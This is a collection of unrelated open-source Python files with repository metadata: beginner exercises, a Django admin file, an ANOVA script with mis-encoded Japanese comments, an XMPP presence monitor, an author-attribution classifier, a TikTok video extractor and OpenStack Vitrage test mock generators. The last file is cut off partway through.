e51de69384d96440f8a070ebdcaf543b91ffe59b
|
/TutorialPoint/01 - Variable Types/9 - DataTypeConversion.py
|
e01050de60aa53fdb923fb3cd0d85adcd0a87449
|
[] |
no_license
|
PriscylaSantos/estudosPython
|
08c8ff245926f88d08a5ba0021ae810d1c548644
|
582e562f34e01db9d8ab6ad9c1c18c7339d3147c
|
refs/heads/master
| 2018-09-09T06:57:52.204792
| 2018-06-05T03:16:38
| 2018-06-05T03:16:38
| 77,758,338
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 500
|
py
|
#!/usr/bin/python3
a = 251.96
print(a)
a= int(a)
print(a)
print('************')
b = 598
print(b)
print(float(b))
print('************')
c=789
print(c)
print(complex(c))
print('************')
d = 45.98
print(d)
print(str(d))
print('************')
e = 947.65
print(e)
print(repr(e))
print('************')
f = 67565
print(f)
print(eval('f'))
print(eval('e + f'))
print('************')
g = (123, 'xyz', 'banana', 'abc')
print(g)
print(tuple(g))
print(list(g))
print(set(g))
print('************')
|
[
"santospriscyla@gmail.com"
] |
santospriscyla@gmail.com
|
fa3f577d5ee48bba9e9a4d305970d0915491d935
|
322ed5d0858a88945f68c073198b74cfc6641b94
|
/pattern_2.py
|
8fb72d09f463135e9499ee377a4c16986b0c8b4e
|
[] |
no_license
|
jeyaprakash1/pattern_programs
|
9282a3672f224af19a1b89fad4f47678d29de0cf
|
12765b99204b1c8713df3d2c24ac64bfb4f878b9
|
refs/heads/master
| 2023-04-01T21:52:30.931953
| 2021-04-09T12:54:23
| 2021-04-09T12:54:23
| 356,271,103
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 139
|
py
|
# 5
# 5 4
# 5 4 3
# 5 4 3 2
# 5 4 3 2 1
for row in range(5,-1,-1):
for col in range(5,row,-1):
print(col,end="")
print()
|
[
"jpofficial1232@gmail.com"
] |
jpofficial1232@gmail.com
|
f3ec4b5d56c492f717d06d10ff2d025e4711e006
|
ef0aeed18a88ee8a2b8049676de91e51ea176138
|
/prac_08/silver_service_taxi.py
|
4bf1fcadbf4c13814e40a8d6950c38c09962be91
|
[] |
no_license
|
anniebbcute/CP1404_Practicals
|
6073dfdc5e065f48254839db7b4d94711639ac5f
|
ee0cdc62f2ce514b37d2d806300b2642994e053a
|
refs/heads/master
| 2020-04-15T08:59:50.181191
| 2019-01-08T02:01:25
| 2019-01-08T02:01:25
| 164,534,130
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 478
|
py
|
from prac_08.taxi import Taxi
class SilverServiceTaxi(Taxi):
flagfall = 4.50
def __init__(self, name, fuel, fanciness):
super().__init__(name, fuel)
self.fanciness = fanciness
self.price_per_km *= fanciness
def __str__(self):
return "{} plus flagfall of ${:.2f}".format(super().__str__(),
self.flagfall)
def get_fare(self):
return self.flagfall + super().get_fare()
|
[
"mengyuan.li@my.jcu.edu.au"
] |
mengyuan.li@my.jcu.edu.au
|
54af91f3b084bfc89ea4529342b2658ee3a18296
|
3509ae9b97f80256489d18e484dfad5cec45433a
|
/zhuanqspidersys/spiderapp/admin.py
|
5090782cc7ef0c718742f2f490b302da7b190951
|
[] |
no_license
|
xichagui/spider
|
64722c0dedaf7405cc10e686ee26aa94002a598b
|
fd5f70e7590c05bae49d914b8c7add6f371b2903
|
refs/heads/master
| 2021-01-20T09:20:58.697145
| 2017-07-12T19:05:47
| 2017-07-12T19:05:47
| 90,242,607
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 193
|
py
|
from django.contrib import admin
# Register your models here.
from spiderapp.models import Work, Author, Style
admin.site.register(Work)
admin.site.register(Author)
admin.site.register(Style)
|
[
"xichagui@gmail.com"
] |
xichagui@gmail.com
|
2ffe545e06630f9a96ba023367bc13c66eb5fdc3
|
382df78024f588acea08039a0b0a9e24f297b6a3
|
/python/numpy/anova.py
|
f5f74623337bf259841cfdfc490d5f14c989db8f
|
[] |
no_license
|
id774/sandbox
|
c365e013654790bfa3cda137b0a64d009866d19b
|
aef67399893988628e0a18d53e71e2038992b158
|
refs/heads/master
| 2023-08-03T05:04:20.111543
| 2023-07-31T14:01:55
| 2023-07-31T14:01:55
| 863,038
| 4
| 1
| null | 2020-03-05T06:18:03
| 2010-08-26T01:05:11
|
TeX
|
UTF-8
|
Python
| false
| false
| 1,128
|
py
|
#! /usr/bin/python
# -*- coding: utf-8 -*-
import numpy as np
data = np.array([[5., 7., 12.],
[6., 5., 10.],
[3., 4., 8.],
[2., 4., 6.]])
s_mean = np.zeros(data.shape)
for i in range(data.shape[1]):
s_mean[:, i] = data[:, i].mean()
print("ๆฐดๆบๅนณๅ " + str(s_mean))
kouka = s_mean - np.ones(data.shape) * data.mean()
print("ๆฐดๆบ้ๅๅทฎ๏ผๅ ๅญใฎๅนๆ๏ผ := ๆฐดๆบๅนณๅ - ๅ
จไฝๅนณๅ " + str(kouka))
Q1 = (kouka * kouka).sum()
print("ๆฐดๆบ้ๅคๅ๏ผๅนๆใฎๅๅทฎๅนณๆนๅ๏ผSS๏ผ๏ผ " + str(Q1))
f1 = data.shape[1] - 1
print("่ช็ฑๅบฆ " + str(f1))
V1 = Q1 / f1
print("ๆฐดๆบ้ๅๅทฎ๏ผๅนๆ๏ผใฎๅนณๅๅนณๆน๏ผMS๏ผ๏ผไธๅคๅๆฃ๏ผ " + str(V1))
error = data - s_mean
print("ๆฐดๆบๅ
ๅๅทฎ๏ผ็ตฑ่จ่ชคๅทฎ๏ผ " + str(error))
Q2 = (error * error).sum()
print("่ชคๅทฎใฎๅๅทฎๅนณๆนๅ๏ผSS๏ผ " + str(Q2))
f2 = (data.shape[0] - 1) * data.shape[1]
print("่ช็ฑๅบฆ๏ผDF๏ผ " + str(f2))
V2 = Q2 / f2
print("ๆฐดๆบๅ
ๅๅทฎ๏ผ่ชคๅทฎ๏ผใฎๅนณๅๅนณๆน๏ผMS๏ผ๏ผไธๅคๅๆฃ๏ผ " + str(V2))
F = V1 / V2
print("ๅๆฃๆฏ๏ผFๅค๏ผ " + str(F))
|
[
"idnanashi@gmail.com"
] |
idnanashi@gmail.com
|
a861df308430c874bb9b35a992ad194fdb7d74b1
|
90f41cf195a1929978cddf06c2f7145efe9477b5
|
/mimir/monitor/presence.py
|
655230a088e2310e58cbf49f7bca9b61fc9eb766
|
[
"MIT"
] |
permissive
|
Cloudxtreme/mimir
|
efd7d774a6592359d174a7ebee3aabdfeb1078a2
|
1e507d9e973bde9ed2d75355c42de5cbfecf691d
|
refs/heads/master
| 2021-05-27T16:13:20.546036
| 2012-05-10T14:09:14
| 2012-05-10T14:09:14
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,266
|
py
|
# Copyright (c) 2005-2007 Ralph Meijer
# See LICENSE for details
from wokkel.xmppim import PresenceClientProtocol
class Storage(object):
def __init__(self, dbpool):
self._dbpool = dbpool
d = self._dbpool.runOperation("""UPDATE presences
SET type='unavailable', show='',
status='', priority=0
WHERE type='available'""")
def eb(failure):
print failure
d.addErrback(eb)
def set_presence(self, entity, available, show, status, priority):
return self._dbpool.runInteraction(self._set_presence, entity,
available,
show,
status,
priority)
def _set_presence(self, cursor, entity, available, show, status, priority):
if available:
type = 'available'
else:
type = 'unavailable'
show = show or ''
status = status or ''
# changed is True when this resource became the top resource, or when
# it continued to be the top resource and the availability or show
# changed, or when another resource became the top resource
changed = False
# Find existing entry for this resource
cursor.execute("""SELECT presence_id, type, show FROM presences
WHERE jid=%s AND resource=%s""",
(entity.userhost(), entity.resource))
result = cursor.fetchone()
print "result: %r" % result
if result:
id, old_type, old_show = result
if old_type == 'unavailable':
# delete old record, the new record will be inserted below
cursor.execute("DELETE FROM presences WHERE presence_id=%s",
id)
if result and old_type == 'available':
if show != old_show:
print " show != old_show"
changed = True
cursor.execute("""UPDATE presences SET
type=%s, show=%s, status=%s, priority=%s,
last_updated=now()
WHERE presence_id=%s""",
(type, show, status, priority, id))
else:
print " new presence record"
changed = True
cursor.execute("""INSERT INTO presences
(type, show, status, priority, jid, resource)
VALUES (%s, %s, %s, %s, %s, %s)""",
(type, show, status, priority,
entity.userhost(), entity.resource))
return changed
def update_roster(self, changed, entity):
return self._dbpool.runInteraction(self._update_roster, changed,
entity)
def _update_roster(self, cursor, changed, entity):
print "Updating roster for %r" % entity.full()
# Find new top resource's presence id
cursor.execute("""SELECT presence_id, resource FROM presences
WHERE jid=%s ORDER by type, priority desc,
(CASE WHEN type='available'
THEN presence_id
ELSE 0
END), last_updated desc""",
entity.userhost())
result = cursor.fetchone()
top_id, top_resource = result
# Get old top resource's presence id.
cursor.execute("SELECT presence_id FROM roster WHERE jid=%s",
entity.userhost())
result = cursor.fetchone()
print "result 2: %r" % result
if result:
old_top_id = result[0]
print " old_top_id %d" % old_top_id
if old_top_id != top_id:
print " old_top_id != top_id"
changed = True
elif entity.resource != top_resource:
print " we are not the top resource"
changed = False
# else, we are still the top resource. Keep the changed value
# that got passed.
cursor.execute("UPDATE roster SET presence_id=%s WHERE jid=%s",
(top_id, entity.userhost()))
else:
changed = True
cursor.execute("""INSERT INTO roster
(presence_id, jid) VALUES
(%s, %s)""",
(top_id, entity.userhost()))
return changed
def remove_presences(self, entity):
return self._dbpool.runInteraction(self._remove_presences, entity)
def _remove_presences(self, cursor, entity):
cursor.execute("DELETE FROM roster WHERE jid=%s", entity.userhost())
cursor.execute("DELETE FROM presences WHERE jid=%s", entity.userhost())
class Monitor(PresenceClientProtocol):
def __init__(self, storage):
self.storage = storage
self.callbacks = []
def connectionInitialized(self):
PresenceClientProtocol.connectionInitialized(self)
self.available()
def register_callback(self, f):
self.callbacks.append(f)
def store_presence(self, entity, available, show, status, priority):
d = self.storage.set_presence(entity, available, show, status, priority)
d.addCallback(self.storage.update_roster, entity)
def cb(changed, entity):
print "Changed %r: %s" % (entity.full(), changed)
if changed:
for f in self.callbacks:
f(entity, available, show)
d.addCallback(cb, entity)
d.addErrback(self.error)
def availableReceived(self, entity, show, statuses, priority):
print "available: %r" % entity.full()
if statuses:
status = statuses.popitem()[1]
else:
status = None
print " status: %r" % status
self.store_presence(entity, True, show, status, priority)
def unavailableReceived(self, entity, statuses):
if statuses:
status = statuses.popitem()[1]
else:
status = None
print " status: %r" % status
self.store_presence(entity, False, None, status, 0)
def error(self, failure):
print failure
class RosterMonitor(Monitor):
def connectionInitialized(self):
self.send("<iq type='get'><query xmlns='jabber:iq:roster'/></iq>")
Monitor.connectionInitialized(self)
def subscribeReceived(self, entity):
self.subscribed(entity)
# return the favour
self.subscribe(entity)
#def subscribedReceived(self, entity):
# pass
def unsubscribeReceived(self, entity):
self.unsubscribed(entity)
# return the favour
self.unsubscribe(entity)
def unsubscribedReceived(self, entity):
d = self.storage.remove_presences(entity)
d.addErrback(self.error)
|
[
"ralphm@ik.nu"
] |
ralphm@ik.nu
|
745537de9256b97545fc0f5e94500f3962355db8
|
853b17641b1a7f61fe979882ea9a12b7a669bc8a
|
/AuthorRecognizer/author_recognizer.py
|
e54c00b027120b1111ef031f6607c803f7de07de
|
[] |
no_license
|
kerata/Cmpe561-NLP
|
dca6c35f6b9d6d0d89a762774e7a28318d801d16
|
04bf37b5a94be5ead7ecdcc26951e13964452d57
|
refs/heads/master
| 2021-01-01T03:55:41.440992
| 2016-05-10T14:14:51
| 2016-05-10T14:14:51
| 58,454,160
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 13,762
|
py
|
#!/usr/local/Cellar/python3/3.5.1/bin/python3.5
import os
import argparse
import utils
from random import shuffle
from math import log
from models import Author
VERBOSE = True
DEBUG = False
LESS = True
vocabulary = {}
training_set = {}
test_set = {}
def train(article_count):
global vocabulary
for author in training_set.values():
author.possibility = log(author.article_count / article_count)
if DEBUG:
print("Vocabulary created: " + str(vocabulary))
utils.print_bold("Training finished")
def map_all_articles_to_authors(path, encoding, ratio):
if VERBOSE:
utils.print_header("Traversing files")
folders = os.listdir(path)
article_count = 0
for author_name in folders:
if VERBOSE:
utils.print_header("Traversing texts of: " + author_name)
if os.path.isdir(os.path.join(path, author_name)):
article_file_names = []
for filename in os.listdir(os.path.join(path, author_name)):
article_file_names.insert(len(article_file_names), os.path.join(path, author_name, filename))
global vocabulary
shuffle(article_file_names)
slicing_point = int(len(article_file_names) * ratio)
article_count += slicing_point
training_set[author_name] = Author(author_name, article_file_names[:slicing_point], encoding, vocabulary)
test_set[author_name] = Author(author_name, article_file_names[slicing_point:], encoding, None)
if VERBOSE:
utils.print_bold(author_name + " learned!")
train(article_count)
find_authors_for_articles()
def probabilities_for_function(func, test_author, reverse=True):
return utils.normalize_probabilities(
[[[trained_author.author_name, func(trained_author, vocabulary=vocabulary, article=article)]
for trained_author in training_set.values()] for article in test_author.articles], reverse=reverse)
def find_authors_for_articles():
if VERBOSE or DEBUG:
utils.print_header("Testing started")
t0 = 0
t1 = 0
t2 = 0
t3 = 0
t4 = 0
t5 = 0
t6 = 0
t7 = 0
t8 = 0
t9 = 0
t10 = 0
total_correct = 0
total_fail = 0
macro_avg = 0
for author_name, test_author in test_set.items():
if VERBOSE:
utils.print_header("Testing for: " + author_name)
naive_probabilities = probabilities_for_function(
Author.calculate_naive_bayes_probability, test_author)
total_probabilities = naive_probabilities
wc_in_sentence_probabilities = probabilities_for_function(
Author.get_diff_word_count_in_sentence, test_author, reverse=False)
wc_in_article_probabilities = probabilities_for_function(
Author.get_diff_word_count_in_article, test_author, reverse=False)
comma_probabilities = probabilities_for_function(
Author.get_diff_comma_count, test_author, reverse=False)
word_length_probabilities = probabilities_for_function(
Author.get_diff_word_length, test_author, reverse=False)
abbreviation_probabilities = probabilities_for_function(
Author.get_diff_abbreviation_count, test_author, reverse=False)
quasi_probabilities = probabilities_for_function(
Author.get_diff_quasi_count, test_author, reverse=False)
quote_probabilities = probabilities_for_function(
Author.get_diff_quote_count, test_author, reverse=False)
exclamation_probabilities = probabilities_for_function(
Author.get_diff_exclamation_count, test_author, reverse=False)
question_probabilities = probabilities_for_function(
Author.get_diff_question_mark_count, test_author, reverse=False)
colon_probabilities = probabilities_for_function(
Author.get_diff_colon_count, test_author, reverse=False)
semicolon_probabilities = probabilities_for_function(
Author.get_diff_semicolon_count, test_author, reverse=False)
for i in range(len(naive_probabilities)):
for j in range(len(naive_probabilities[i])):
total_probabilities[i][j][1] = naive_probabilities[i][j][1] * 40
val = [x[1] for k, x in enumerate(wc_in_sentence_probabilities[i])
if x[0] == naive_probabilities[i][j][0]][0]
total_probabilities[i][j][1] += val * 1
val = [x[1] for k, x in enumerate(wc_in_article_probabilities[i])
if x[0] == naive_probabilities[i][j][0]][0]
total_probabilities[i][j][1] += val * 1
val = [x[1] for k, x in enumerate(comma_probabilities[i])
if x[0] == naive_probabilities[i][j][0]][0]
total_probabilities[i][j][1] += val * 1
val = [x[1] for k, x in enumerate(word_length_probabilities[i])
if x[0] == naive_probabilities[i][j][0]][0]
total_probabilities[i][j][1] += val * 1
# val = [x[1] for k, x in enumerate(abbreviation_probabilities[i])
# if x[0] == naive_probabilities[i][j][0]][0]
# total_probabilities[i][j][1] += val * 1
# val = [x[1] for k, x in enumerate(quasi_probabilities[i])
# if x[0] == naive_probabilities[i][j][0]][0]
# total_probabilities[i][j][1] += val * 1
# val = [x[1] for k, x in enumerate(quote_probabilities[i])
# if x[0] == naive_probabilities[i][j][0]][0]
# total_probabilities[i][j][1] += val * 1
# val = [x[1] for k, x in enumerate(exclamation_probabilities[i])
# if x[0] == naive_probabilities[i][j][0]][0]
# total_probabilities[i][j][1] += val * 1
# val = [x[1] for k, x in enumerate(question_probabilities[i])
# if x[0] == naive_probabilities[i][j][0]][0]
# total_probabilities[i][j][1] += val * 1
val = [x[1] for k, x in enumerate(colon_probabilities[i])
if x[0] == naive_probabilities[i][j][0]][0]
total_probabilities[i][j][1] += val * 1
val = [x[1] for k, x in enumerate(semicolon_probabilities[i])
if x[0] == naive_probabilities[i][j][0]][0]
total_probabilities[i][j][1] += val * 1
total_probabilities = [sorted(author, key=lambda a: a[1], reverse=True) for author in total_probabilities]
correct = 0
fail = 0
for i in range(len(total_probabilities)):
guessed_author_names = [author[0] for author in total_probabilities[i]]
if author_name == guessed_author_names[0]:
correct += 1
if DEBUG or VERBOSE and not LESS:
utils.print_green(author_name + " : " + str(guessed_author_names[0]))
else:
fail += 1
if DEBUG or VERBOSE and not LESS:
utils.print_fail(author_name + " : " + guessed_author_names[0] +
" rank : " + str(guessed_author_names.index(author_name)))
if DEBUG:
utils.print_blue("wc_sentence : " + str([k for k, x in enumerate(wc_in_sentence_probabilities[i])
if x[0] == author_name][0]))
utils.print_blue("wc_in_article : " + str([k for k, x in enumerate(wc_in_article_probabilities[i])
if x[0] == author_name][0]))
utils.print_blue("word_length : " + str([k for k, x in enumerate(word_length_probabilities[i])
if x[0] == author_name][0]))
utils.print_blue("abbreviation : " + str([k for k, x in enumerate(abbreviation_probabilities[i])
if x[0] == author_name][0]))
utils.print_blue("quasi : " + str([k for k, x in enumerate(quasi_probabilities[i])
if x[0] == author_name][0]))
utils.print_blue("quote : " + str([k for k, x in enumerate(quote_probabilities[i])
if x[0] == author_name][0]))
utils.print_blue("exclamation : " + str([k for k, x in enumerate(exclamation_probabilities[i])
if x[0] == author_name][0]))
utils.print_blue("question : " + str([k for k, x in enumerate(question_probabilities[i])
if x[0] == author_name][0]))
utils.print_blue("comma : " + str([k for k, x in enumerate(comma_probabilities[i])
if x[0] == author_name][0]))
utils.print_blue("colon : " + str([k for k, x in enumerate(colon_probabilities[i])
if x[0] == author_name][0]))
utils.print_blue("semicolon : " + str([k for k, x in enumerate(semicolon_probabilities[i])
if x[0] == author_name][0]))
t0 += [k for k, x in enumerate(wc_in_sentence_probabilities[i]) if x[0] == author_name][0]
t1 += [k for k, x in enumerate(wc_in_article_probabilities[i]) if x[0] == author_name][0]
t2 += [k for k, x in enumerate(word_length_probabilities[i]) if x[0] == author_name][0]
t3 += [k for k, x in enumerate(abbreviation_probabilities[i]) if x[0] == author_name][0]
t4 += [k for k, x in enumerate(quasi_probabilities[i]) if x[0] == author_name][0]
t5 += [k for k, x in enumerate(quote_probabilities[i]) if x[0] == author_name][0]
t6 += [k for k, x in enumerate(exclamation_probabilities[i]) if x[0] == author_name][0]
t7 += [k for k, x in enumerate(question_probabilities[i]) if x[0] == author_name][0]
t8 += [k for k, x in enumerate(comma_probabilities[i]) if x[0] == author_name][0]
t9 += [k for k, x in enumerate(colon_probabilities[i]) if x[0] == author_name][0]
t10 += [k for k, x in enumerate(semicolon_probabilities[i]) if x[0] == author_name][0]
macro_avg += correct / (correct + fail)
if DEBUG or VERBOSE and not LESS:
utils.print_blue(author_name +
" correct : " + str(correct) +
" fail : " + str(fail) +
" res : " + str(macro_avg))
total_correct += correct
total_fail += fail
if DEBUG:
utils.print_header("Extra feature average ranks: ")
utils.print_bold("word count in sentence:" + str(t0 / total_fail))
utils.print_bold("word count in article: " + str(t1 / total_fail))
utils.print_bold("word length: " + str(t2 / total_fail))
utils.print_bold("abbreviation count: " + str(t3 / total_fail))
utils.print_bold("quasi count: " + str(t4 / total_fail))
utils.print_bold("quote count: " + str(t5 / total_fail))
utils.print_bold("exclamation count: " + str(t6 / total_fail))
utils.print_bold("question mark count: " + str(t7 / total_fail))
utils.print_bold("comma count: " + str(t8 / total_fail))
utils.print_bold("colon count: " + str(t9 / total_fail))
utils.print_bold("semicolon count: " + str(t10 / total_fail))
utils.print_header("Correct : " + str(total_correct) +
" Fail : " + str(total_fail))
utils.print_header("Micro Averaged : " + str(total_correct / (total_correct + total_fail)))
utils.print_header("Macro Averaged : " + str(macro_avg / len(test_set)))
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('-v', '--verbose', dest='verbose', action='store_true')
parser.add_argument('-nv', '--no-verbose', dest='verbose', action='store_false')
parser.add_argument('-d', '--debug', dest='debug', action='store_true')
parser.add_argument('-nd', '--no-debug', dest='debug', action='store_false')
parser.add_argument('-nl', '--no-less', dest='less', action='store_false')
parser.add_argument('-l', '--less', dest='less', action='store_true')
parser.add_argument('-p', '--path', default="./raw_texts", type=str, help='Path to container folder')
parser.add_argument('-e', '--encoding', default="windows-1254", type=str, help='File encoding')
parser.add_argument('-a', '--alpha', default="0.011", type=float, help='Alpha value for naive bayes normalizer')
parser.add_argument('-r', '--ratio', default=0.6, type=float, help='Rate to split for test and training sets')
opts = parser.parse_args()
Author.alpha = opts.alpha
VERBOSE = opts.verbose
LESS = opts.less
DEBUG = opts.debug
if VERBOSE:
print("VERBOSE: true DEBUG: " + str(DEBUG) + " LESS: " + str(LESS) + " folder_path: " + opts.path +
" encoding: " + opts.encoding + " alpha for normalization: " + str(opts.alpha) +
" Training/Data: " + str(opts.ratio))
map_all_articles_to_authors(path=opts.path, encoding=opts.encoding, ratio=opts.ratio)
|
[
"merttiftikci@gmail.com"
] |
merttiftikci@gmail.com
|
a99bffaff666e643eaebaf370beba5018ff88415
|
10717fe6f68c4ee9bcf27ee62e89581f4a030b8e
|
/extractor/tiktok.py
|
63aca954198bb80252aac6500ccde099ebec1c18
|
[] |
no_license
|
HagerHosny199/Testing_Project
|
ff7f9a54b7a213c9d9ade0c5192845c2a29adc8b
|
9bc170263e239cc24ccfb2aa33b9913ff799ffe9
|
refs/heads/master
| 2020-05-17T20:57:01.750640
| 2019-05-08T22:13:06
| 2019-05-08T22:13:06
| 183,954,736
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,808
|
py
|
# coding: utf-8
from __future__ import unicode_literals
from .common import InfoExtractor
from utils import (
compat_str,
ExtractorError,
int_or_none,
str_or_none,
try_get,
url_or_none,
)
class TikTokBaseIE(InfoExtractor):
def _extract_aweme(self, data):
video = data['video']
description = str_or_none(try_get(data, lambda x: x['desc']))
width = int_or_none(try_get(data, lambda x: video['width']))
height = int_or_none(try_get(data, lambda x: video['height']))
format_urls = set()
formats = []
for format_id in (
'play_addr_lowbr', 'play_addr', 'play_addr_h264',
'download_addr'):
for format in try_get(
video, lambda x: x[format_id]['url_list'], list) or []:
format_url = url_or_none(format)
if not format_url:
continue
if format_url in format_urls:
continue
format_urls.add(format_url)
formats.append({
'url': format_url,
'ext': 'mp4',
'height': height,
'width': width,
})
self._sort_formats(formats)
thumbnail = url_or_none(try_get(
video, lambda x: x['cover']['url_list'][0], compat_str))
uploader = try_get(data, lambda x: x['author']['nickname'], compat_str)
timestamp = int_or_none(data.get('create_time'))
comment_count = int_or_none(data.get('comment_count')) or int_or_none(
try_get(data, lambda x: x['statistics']['comment_count']))
repost_count = int_or_none(try_get(
data, lambda x: x['statistics']['share_count']))
aweme_id = data['aweme_id']
return {
'id': aweme_id,
'title': uploader or aweme_id,
'description': description,
'thumbnail': thumbnail,
'uploader': uploader,
'timestamp': timestamp,
'comment_count': comment_count,
'repost_count': repost_count,
'formats': formats,
}
class TikTokIE(TikTokBaseIE):
_VALID_URL = r'''(?x)
https?://
(?:
(?:m\.)?tiktok\.com/v|
(?:www\.)?tiktok\.com/share/video
)
/(?P<id>\d+)
'''
_TESTS = [{
'url': 'https://m.tiktok.com/v/6606727368545406213.html',
'md5': 'd584b572e92fcd48888051f238022420',
'info_dict': {
'id': '6606727368545406213',
'ext': 'mp4',
'title': 'Zureeal',
'description': '#bowsette#mario#cosplay#uk#lgbt#gaming#asian#bowsettecosplay',
'thumbnail': r're:^https?://.*~noop.image',
'uploader': 'Zureeal',
'timestamp': 1538248586,
'upload_date': '20180929',
'comment_count': int,
'repost_count': int,
}
}, {
'url': 'https://www.tiktok.com/share/video/6606727368545406213',
'only_matching': True,
}]
def _real_extract(self, url):
video_id = self._match_id(url)
webpage = self._download_webpage(
'https://m.tiktok.com/v/%s.html' % video_id, video_id)
data = self._parse_json(self._search_regex(
r'\bdata\s*=\s*({.+?})\s*;', webpage, 'data'), video_id)
return self._extract_aweme(data)
class TikTokUserIE(TikTokBaseIE):
_VALID_URL = r'''(?x)
https?://
(?:
(?:m\.)?tiktok\.com/h5/share/usr|
(?:www\.)?tiktok\.com/share/user
)
/(?P<id>\d+)
'''
_TESTS = [{
'url': 'https://m.tiktok.com/h5/share/usr/188294915489964032.html',
'info_dict': {
'id': '188294915489964032',
},
'playlist_mincount': 24,
}, {
'url': 'https://www.tiktok.com/share/user/188294915489964032',
'only_matching': True,
}]
def _real_extract(self, url):
user_id = self._match_id(url)
data = self._download_json(
'https://m.tiktok.com/h5/share/usr/list/%s/' % user_id, user_id,
query={'_signature': '_'})
entries = []
for aweme in data['aweme_list']:
try:
entry = self._extract_aweme(aweme)
except ExtractorError:
continue
entry['extractor_key'] = TikTokIE.ie_key()
entries.append(entry)
return self.playlist_result(entries, user_id)
|
[
"hagarhosny19@gmail.com"
] |
hagarhosny19@gmail.com
|
486b0bc4ab7101ed1242be7c341f55b6a0ddedfd
|
f62fd455e593a7ad203a5c268e23129473d968b6
|
/vitrage-1.5.2/vitrage/tests/mocks/mock_driver.py
|
d614d822510efc12f16fcaeff09d09236e599f20
|
[
"Apache-2.0"
] |
permissive
|
MinbinGong/OpenStack-Ocata
|
5d17bcd47a46d48ff9e71e2055f667836174242f
|
8b7650128cfd2fdf5d6c8bc4613ac2e396fb2fb3
|
refs/heads/master
| 2021-06-23T05:24:37.799927
| 2017-08-14T04:33:05
| 2017-08-14T04:33:05
| 99,709,985
| 0
| 2
| null | 2020-07-22T22:06:22
| 2017-08-08T15:48:44
|
Python
|
UTF-8
|
Python
| false
| false
| 20,845
|
py
|
# Copyright 2015 - Alcatel-Lucent
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Methods for generating driver events
For each type of entity, need to supply configuration files that specify (a
regex of) what can be returned, which will be used to generate driver events
usage example:
test_entity_spec_list = [
{mg.DYNAMIC_INFO_FKEY: 'driver_inst_snapshot_dynamic.json',
mg.STATIC_INFO_FKEY: 'driver_inst_snapshot_static.json',
mg.MAPPING_KEY: [('vm1', 'host1'), ('vm2', 'host1'), ('vm3','host2')],
mg.NAME_KEY: 'Instance (vm) generator',
NUM_EVENTS_KEY: 10
}
]
spec_list = get_mock_generators(test_entity_spec_list)
events = generate_random_events_list(spec_list)
for e in events:
print e
"""
import random
from vitrage.common.constants import DatasourceAction
from vitrage.common.constants import DatasourceProperties as DSProps
import vitrage.tests.mocks.trace_generator as tg
from vitrage.utils.datetime import utcnow
def generate_random_events_list(generator_spec_list):
"""Generates random events for the generators given.
Each element in the list of generators includes a generator and
number of events to generate for it's entities
:param generator_spec_list: list of generators
:type generator_spec_list: list
:return list of driver events
:rtype list
"""
data = []
for spec in generator_spec_list:
generator = spec[tg.GENERATOR]
data += tg.generate_data_stream(generator.models, spec[tg.NUM_EVENTS])
random.shuffle(data)
return data
def generate_sequential_events_list(generator_spec_list):
"""Generates random events for the generators given.
Each element in the list of generators includes a generator and
number of events to generate for it's entities
:param generator_spec_list: list of generators
:type generator_spec_list: list
:return list of driver events
:rtype list
"""
data = []
for spec in generator_spec_list:
generator = spec[tg.GENERATOR]
data += tg.generate_round_robin_data_stream(generator.models,
spec[tg.NUM_EVENTS])
return data
def simple_instance_generators(host_num, vm_num,
snapshot_events=0, update_events=0,
snap_vals=None, update_vals=None):
"""A function for returning vm event generators.
Returns generators for a given number of hosts and
instances. Instances will be distributed across hosts in round-robin style.
:param host_num: number of hosts
:param vm_num: number of vms
:param snapshot_events: number of snapshot events per instance
:param update_events: number of update events per instance
:param snap_vals: preset vals for ALL snapshot events
:param update_vals: preset vals for ALL update events
:return: generators for vm_num vms as specified
"""
mapping = [('vm-{0}'.format(index), 'host-{0}'.format(index % host_num))
for index in range(vm_num)
]
test_entity_spec_list = []
if snapshot_events:
test_entity_spec_list.append(
{tg.DYNAMIC_INFO_FKEY: tg.DRIVER_INST_SNAPSHOT_D,
tg.STATIC_INFO_FKEY: tg.DRIVER_INST_SNAPSHOT_S,
tg.EXTERNAL_INFO_KEY: snap_vals,
tg.MAPPING_KEY: mapping,
tg.NAME_KEY: 'Instance (vm) snapshot generator',
tg.NUM_EVENTS: snapshot_events
}
)
if update_events:
test_entity_spec_list.append(
{tg.DYNAMIC_INFO_FKEY: tg.DRIVER_INST_UPDATE_D,
tg.STATIC_INFO_FKEY: None,
tg.EXTERNAL_INFO_KEY: update_vals,
tg.MAPPING_KEY: mapping,
tg.NAME_KEY: 'Instance (vm) update generator',
tg.NUM_EVENTS: update_events
}
)
return tg.get_trace_generators(test_entity_spec_list)
def simple_host_generators(zone_num, host_num, snapshot_events=0,
snap_vals=None):
"""A function for returning vm event generators.
Returns generators for a given number of hosts and
instances. Instances will be distributed across hosts in round-robin style.
:param zone_num: number of zones
:param host_num: number of hosts
:param snapshot_events: number of snapshot events per host
:param snap_vals: preset vals for ALL snapshot events
:return: generators for host_num hosts as specified
"""
mapping = [('host-{0}'.format(index), 'zone-{0}'.format(index % zone_num))
for index in range(host_num)
]
test_entity_spec_list = []
if snapshot_events:
test_entity_spec_list.append(
{tg.DYNAMIC_INFO_FKEY: tg.DRIVER_HOST_SNAPSHOT_D,
tg.STATIC_INFO_FKEY: None,
tg.EXTERNAL_INFO_KEY: snap_vals,
tg.MAPPING_KEY: mapping,
tg.NAME_KEY: 'Host snapshot generator',
tg.NUM_EVENTS: snapshot_events
}
)
return tg.get_trace_generators(test_entity_spec_list)
def simple_zone_generators(zone_num, host_num, snapshot_events=0,
snap_vals=None):
"""A function for returning zone event generators.
